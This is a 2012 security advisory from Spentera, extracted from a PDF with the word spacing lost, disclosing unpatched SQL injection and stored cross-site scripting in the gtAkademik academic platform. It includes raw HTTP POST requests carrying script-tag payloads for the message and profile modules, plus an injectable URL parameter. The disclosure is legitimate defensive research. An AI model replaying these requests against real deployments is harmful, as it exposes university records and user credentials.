7/27/2019 SPN-01-2012

http://slidepdf.com/reader/full/spn-01-2012 1/6

 

Copyright©2012.Spentera.Allrightsreserved. Page1

http://www.spentera.com Version1.3 

Spentera–SecurityAdvisory–SPN-01-2012

gtAkademikGamatechnoSQLInjectionandPersistentCross

SiteScriptingVulnerability

February20,2012

7/27/2019 SPN-01-2012

http://slidepdf.com/reader/full/spn-01-2012 2/6

 

Copyright©2012.Spentera.Allrightsreserved. Page2

http://www.spentera.com Version1.3 

gtAkademikGamatechno–SQLInjectionandPersistentCross-siteScripting–

SecurityAdvisory–SPN-01-2012

ReleaseDate Monday,February20,2012

LastUpdate Tuesday,June19,2012

VendorNotificationDate Friday,February10,2012

Product gtAkademikGamatechnoPlatform PHP

 AffectedVersions Latestrelease(2011)

Testedon:Ubuntu11.10,Apache2.2.11,PHP5.3.9

RiskFactor

Impact Lossofintegrityandconfidentialityonserverandclientside.

 AttackVector Attackercanretrievedatafromtargetdatabaseandplanclient

sideattackusingXSSbyeditexistinguserprofileandinject

javascriptXSSshell.

SolutionStatus Unpatched

SoftwareDescription

GtAkademikAcademicaisaweb-basedapplicationfocusesonacademicandadministrativedata

managementforuniversitystudents,managingtheactivitiesofKRS,student'sgrading

management,curriculummanagement&semester,untilDIKTIreporting.GtAkademikalsohas

featuressuchas;AutomationReportingSystemForEPSBEDDIKTI,SupportsCurriculum

High

7/27/2019 SPN-01-2012

http://slidepdf.com/reader/full/spn-01-2012 3/6

 

Copyright©2012.Spentera.Allrightsreserved. Page3

http://www.spentera.com Version1.3 

Changes,EaseofmanagementofStudentTranscript,VirtualClass(eLearning),KRSandOnline

Coaching,andReporting.

VulnerabilityDetails

PersistentXSS

TheApplicationallowsanattackertoinjecttheXSSscriptinsidethedatabase(stored),because

thereisnosuchsanitationsprocess.TherearetwomodulessufferwithXSS:MessageModuleandUpdateProfileModule.

SQLInjection

The Application also suffers to SQL injection vulnerability, also because there is no such

sensitization process, this allowan attacker to extract contentsofdatabase, and find a lot of

importantdata,forexamplecredentialsthatstoredinsidethedatabase.

ProofofConcept

PersistentXSSinMessageModule

MessagemoduleisamoduleforinternalmessaginginsidethegtAkademik,wecansendanXSS

craftedmessagetoothersforexamplewecansendittoadministratoruser.

POST /index.php?pModule=zsinppiZmQ==&pSub=zsinppiZmQ==&pAct=0dWjlpylpw== HTTP/1.1

Host: 1.1.1.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Proxy-Connection: keep-alive

7/27/2019 SPN-01-2012

http://slidepdf.com/reader/full/spn-01-2012 4/6

 

Copyright©2012.Spentera.Allrightsreserved. Page4

http://www.spentera.com Version1.3 

Referer:

http://1.1.1.1/index.php?pModule=zsinppiZmQ==&pSub=xNKho6almcWem9isk5uW&pAct=18yZqg

==

Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX

Content-Type: application/x-www-form-urlencoded

Content-Length: 169

data%5BMessageSender%5D=XXXXXXXXXX&data%5BMessageReceiver%5D=XXXXXXXXXX&data%5BMess

ageTitle%5D=%3Cscript%3E&data%5BMessageContent%5D=%3Cscript%3E&act=doCompose&compBt

n=Kirim

PersistentXSSinUserProfileModule(savetheuserprofile)

It’samoduleusedwhenwewanttoupdatetheprofile,wecaninjectanXSSintotheprofileand

thensaveitintothedatabase,soeveryonewhotrytoviewourprofile,canbeattackedusingthe

XSS.

POST /index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw== HTTP/1.1

Host: 1.1.1.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Proxy-Connection: keep-alive

Referer:

http://1.1.1.1/index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw==&sia=ydeoo

3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/T

nKM=

Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX

Content-Type: application/x-www-form-urlencodedContent-Length: 213

tanggal=02%2F08%2F1988&alamat_asal=XXXXXXXXXX&alamat=%3Cscript%3Ealert%28%22XSS%22%

29%3B%3C%2Fscript%3E&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp

7/27/2019 SPN-01-2012

http://slidepdf.com/reader/full/spn-01-2012 5/6

 

Copyright©2012.Spentera.Allrightsreserved. Page5

http://www.spentera.com Version1.3 

_ortu=&simpan=Simpan SQLInjectionin‘id’parameter.

Theparameter‘id’isvulnerabletoSQLInjection.

http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204[INJEC

TEDPARAMETER]

Solution

Unpatched

Discoveredby

MadaR.PerdhanaandHannyHaliwelafromSpenteraResearch.

7/27/2019 SPN-01-2012

http://slidepdf.com/reader/full/spn-01-2012 6/6

 

Copyright©2012.Spentera.Allrightsreserved. Page6

http://www.spentera.com Version1.3 

 AboutUs

Spenteraisalimitedliabilitysecurityconsultingcompanythatfocusesonpenetrationtestingservices,vulnerabilitydiscovery,anddigitalforensics.Wehavebeenprovidingsatisfactory

servicetoclientsinIndonesiainparticular,andtheworldatlarge.Ourportfoliobecomeaproof

thatwearebuildingthiscompanyseriouslyandpayattentiontoeveryqualitythatisgiventotheclient.Allservicesweprovidearebasedoninternationalstandardsandareusedasprimary

standardsinsomecountriesliketheUnitedStates,Japan,Germany,France,andUnitedKingdom.

Someoftheclientsthatwehandleincludemilitary,police,government,mining,oilandgas,and

theprivatesectorsuchasfinance,andbanking.

Oursecurityexpertsexperiencefor7yearshasnodoubt.Ourgoodrelationshipwiththeclientis

themostimportantbasisforqualityofservicethatwecontinuetoimprove.

SpenteraCenterflixBoutiqueOffice

Jl.DanauTobano.104,BendunganHilir.

JakartaPusat.10210.

Jakarta.Indonesia.

T:+62(21)5701505F:+62(21)5738105

W:http://www.spentera.comE:research@spentera.com